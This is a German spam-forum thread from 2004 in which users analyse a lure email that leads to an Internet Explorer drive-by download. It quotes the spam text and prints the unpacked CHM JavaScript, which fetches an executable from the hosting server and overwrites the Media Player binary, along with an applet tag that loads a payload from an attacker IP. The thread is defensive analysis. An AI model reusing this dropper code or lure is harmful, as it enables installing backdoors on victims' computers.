Ergebnis 1 bis 3 von 3

Thema: [Exploit] (no subject)

  1. #1
    peter1962
    Gast

    Standard [Exploit] (no subject)

    From - Sat Sep 18 10:18:20 2004
    X-UIDL: 51bf88a2e1a878e2a728657e23248168
    X-Mozilla-Status: 0001
    X-Mozilla-Status2: 00000000
    Return-Path: <dubhebellini40627@lycos.com>
    X-Flags: 1000
    Delivered-To: GMX delivery to me.....@gmx.de
    Received: (qmail 30605 invoked by uid 65534); 18 Sep 2004 08:09:11 -0000
    Received: from u60-115.u219-71.giga.net.tw (HELO u60-115.u219-71.giga.net.tw) (219.71.60.115)
    by mx0.gmx.net (mx021) with SMTP; 18 Sep 2004 10:09:11 +0200
    Received: from 154.15.96.34 by 219.71.60.115 Sat, 18 Sep 2004 04:06:42 -0500
    Message-ID: <rhwzyyauhNbSgFay@highstream.com>
    From: "frown Hickman" <dubhebellini40627@lycos.com>
    Reply-To: "frown Hickman" <dubhebellini40627@lycos.com>
    To: me.....@gmx.de
    Subject:
    Date: Sat, 18 Sep 2004 15:06:42 +0600
    X-Mailer: AOL 7.0 for Windows US sub 118 importunate podium
    track-chum: cope fuchs toledo
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="--06679282214467378"
    X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
    X-GMX-Antispam: 4 (From mass domain over foreign mail server)
    not sure if you got this message before since my Outlook crashed :/
    i`m feeling very lonely lately, even though i`m a fun person and not that bad lookin :/ feels like I will never find what I`m looking for in life, does it ever happend to you ? my roomate Nikki is trying to cheer me up by asking me to go to the club with her, but I feel like staying home today because I`ve been there so many times and it`s not as fun anymore. If you feel like chatting with me come to my page:
    hXXp://www.g-packs21.biz
    kisses, pam ;X
    budd blurt freight draco
    fibrosis gratuity grade ibm 2

    ....................................................
    Ich denke die Seite ist eine IE-Falle
    Im Quelltext findet sich ein Verweis auf hXXp://200.16.144.130/exploit.htm
    wo anscheinend eine blai.exe automatisch untergeschoben wird.
    Wer hat nee Ahnung was das Teil macht?
    Links sind wegen der klickwütigen entschärft!
    Gruß
    Peter




  2. #2
    Coke1984
    Gast

    Standard RE:[Exploit] (no subject)

    Laut quellcode der exploit.htm läd dieser im IE (in anderen Browsern funzt der code nicht) die datei exploit.chm runter. Laut der Virusdatenbank von panda antivirus läd der beliebigen code runter, also in der regel dann trojaner.
    So weit hab ich das ganze allerdings nicht verfolgt, ich werde mal sehen ob ich einen chm-unpacker oder ähnliches finde damit ich mal in den code schauen kann. Hier die original virus definition von panda:
    Exploit.CHM is a vulnerability exploit. It is not categorized as a virus, worm or Trojan. To be more precise, it is a malicious code that could be hosted in a web page in order to exploit a vulnerability in the browser Internet Explorer. Affected versions are: 5.01, 5.5 and 6.0 with Service Pack 1.
    If an HTML file (for example, a web page) loads a file with a CHM (Compiled HTML) extension using a concrete sequence, the CHM file would be copied to the hard drive of the affected computer, and the script code it contained (as part of the HTML file) would be run. This allows to run arbitrary code on the affected computer, without user`s intervention, just by accessing a malicious web page.
    This exploit is being used in order to download and run Trojans and other malware on affected computers.
    Currently, there is no security patch available for this vulnerability.
    ---
    http://www.g1n.net - The Alcommunity


  3. #3
    Coke1984
    Gast

    Standard RE:[Exploit] (no subject)

    Nachtrag: Unter http://www.mjmwired.net/resources/wi...e-cleanup.html habe ich das tool chmdump gefunden, das die kompilierten chm`s wieder entsprechend entpacken kann.
    Daraus ergibt sich ein Javascript folgenden Inhalts:
    function getPath(url) {
    start = url.indexOf(`http:`)
    end = url.indexOf(`EXPLOIT.CHM`)
    return url.substring(start, end);
    }

    payloadURL = getPath(location.href)+`exploit.exe`;

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET",payloadURL,0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
    location.href = "mms://";
    Offenbar läd also jener Javascript die Datei exploit.exe vom server, und überschreibt damit die Startdatei des mediaplayers, so dass dieser jedesmal aufgerufen wird, wenn der mediaplayer starten soll. Dies wiederum funzt nur in englischen windows versionen, in der deutschen lautet der pfad c:programme.. Somit existiert die file zwar, man läuft aber nicht in gefahr diese zu starten wenn man den WMP öffnen will.
    Die file exploit.exe selbst enthält dann laut meinem AV die signatur der "Backdoor.Thunk.d", hierzu konnte ich keine allzu nützlichen infos finden... aber naja, trojaner halt.
    Tod dem IE!
    <font color="#00C000">Edit: Leider konnte ich keinen Hinweis im Code auf die Datei blai.exe finden, aber sie ist inhaltlich identisch mit exploit.exe, auch die selbe AV-Signatur.
    Edit-Edit: Ruft man die URL respektive IP-Adresse ohne angehängtes html-dokument auf, wird dort versucht ein Java-Applet zu laden das als source jene Datei läd < -- APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1 HEIGHT=1><PARAM NAME="ModulePath" VALUE="hXXp://200.16.144.130/blai.exe"></APPLET -- >
    </font>
    200.16.144.130 ist gehostet in Buenos Aires... abuse schick ich mal raus, aber ich vermute das kann ich mir genausogut auch schenken.

    ---
    http://www.g1n.net - The Alcommunity


Ähnliche Themen

  1. [Update][Exploit/Trojaner] Free young girls pics
    Von Sirius im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 11
    Letzter Beitrag: 29.04.2008, 14:12
  2. [Exploit] Where did Ryan go
    Von Princo im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 2
    Letzter Beitrag: 06.05.2005, 21:29
  3. [Exploit] Hallo Sein Ich! Meine Neuen Bilder!
    Von Gool im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 6
    Letzter Beitrag: 29.03.2005, 09:27
  4. [UCE] No Subject
    Von Houser im Forum 1.2 international
    Antworten: 0
    Letzter Beitrag: 21.07.2004, 17:10
  5. [Exploit] Important Message
    Von mindphlux im Forum 1.2 international
    Antworten: 0
    Letzter Beitrag: 19.06.2004, 20:48

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen